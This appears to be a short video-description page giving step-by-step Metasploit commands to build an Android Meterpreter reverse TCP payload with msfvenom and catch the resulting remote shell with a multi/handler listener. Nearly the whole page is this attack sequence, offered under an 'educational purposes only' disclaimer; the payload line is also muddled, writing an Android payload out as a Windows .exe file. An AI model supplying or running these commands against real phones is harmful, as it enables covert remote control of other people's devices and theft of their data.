Advertisement

Metasploit Framework - Reverse TCP - Obtaining a shell on Android

Metasploit Framework - Reverse TCP - Obtaining a shell on Android ==========================================
THIS VIDEO IS FOR EDUCATIONAL PURPOSES ONLY
==========================================

In this video, we go over how to use msfvenom to set up a reverse TCP listener to exploit an Android phone.

Leave a like if you enjoyed!

==========================================
commands
==========================================
msfvenom -p android/meterpreter/reverse_tcp LHOST=(host addresss) LPORT=(custom port name i.e. 444) -f exe -o /home/kali/Desktop/shell.exe

sudo msfconsole

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST (host address)

set LPORT (custom port)

run

Android

Post a Comment

0 Comments